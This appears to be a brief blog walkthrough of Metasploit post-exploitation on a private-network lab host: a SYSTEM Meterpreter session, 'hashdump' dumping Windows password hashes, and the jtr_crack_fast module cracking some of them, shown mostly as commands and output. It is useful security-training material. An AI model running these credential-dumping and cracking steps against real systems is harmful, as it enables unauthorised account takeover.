control – metasploit john the ripper

Once you gain a session what can you do?

jtr_crack_fast

[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY 9377e3b56dfc42b558e6568c92c4d2dd…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hashes…

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:8064893404a6f026ca568218bc865d63:9ddc730aea3f980a7835df24ea17241a:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:481d4a0de46329f9e12716ebd82bb2f3:::
IUSR_TE-D12B242FF348:1004:b707ad3d3079aa8e453d8b073c04b55a:ff80b8a838a28f4dbec1fbcae6563bd8:::
IWAM_TE-D12B242FF348:1005:c9782c35f7b9947e2f83a8051aa6f1d0:7e7bb355dda1560973ba086b45b478ee:::
ASPNET:1006:22f5f4866f10502f0c19c47029cc7c60:f67b93aac3bf3576ca8f466883d5790a:::
Test:1022:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::

meterpreter >    (ctrl+z)

y (yes)

> use auxiliary/analyze/jtr_crack_fast

msf auxiliary(jtr_crack_fast) > run

[*] Seeded the password database with 10 words…
guesses: 3  time: 0:00:00:04 DONE (Tue Jul 19 16:34:41 2011)  c/s: 31650K  trying: WOP1900 – ZZZ1900
Warning: passwords printed above might be partial and not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably

Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 1  time: 0:00:00:05 DONE (Tue Jul 19 16:34:47 2011)  c/s: 137705K  trying: ||V} – |||}
Warning: passwords printed above might be partial and not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably
[*] Output: Loaded 13 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 10 password hashes with no different salts
[*] Output: (cred_1)
guesses: 0  time: 0:00:00:00 DONE (Tue Jul 19 16:34:47 2011)  c/s: 3846K  trying: 89093 – 89092
[*] Output: Loaded 13 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 9 password hashes with no different salts
guesses: 1  time: 0:00:00:12 DONE (Tue Jul 19 16:35:00 2011)  c/s: 38594K  trying: zworykin1900 – password1900
Warning: passwords printed above might not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: password         (cred_9)
guesses: 1  time: 0:00:00:05 DONE (Tue Jul 19 16:35:05 2011)  c/s: 92318K  trying: |||}
Warning: passwords printed above might not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 7 password hashes with no different salts
[*] Output: (cred_1)
guesses: 0  time: 0:00:00:00 DONE (Tue Jul 19 16:35:06 2011)  c/s: 2777K  trying: 89030 – 89092
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 6 password hashes with no different salts
[+] Cracked: Administrator: (192.168.0.200:445)
[+] Cracked: Guest: (192.168.0.200:445)
[+] Cracked: Test:password (192.168.0.200:445)
[*] Auxiliary module execution completed
msf auxiliary(jtr_crack_fast) >

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s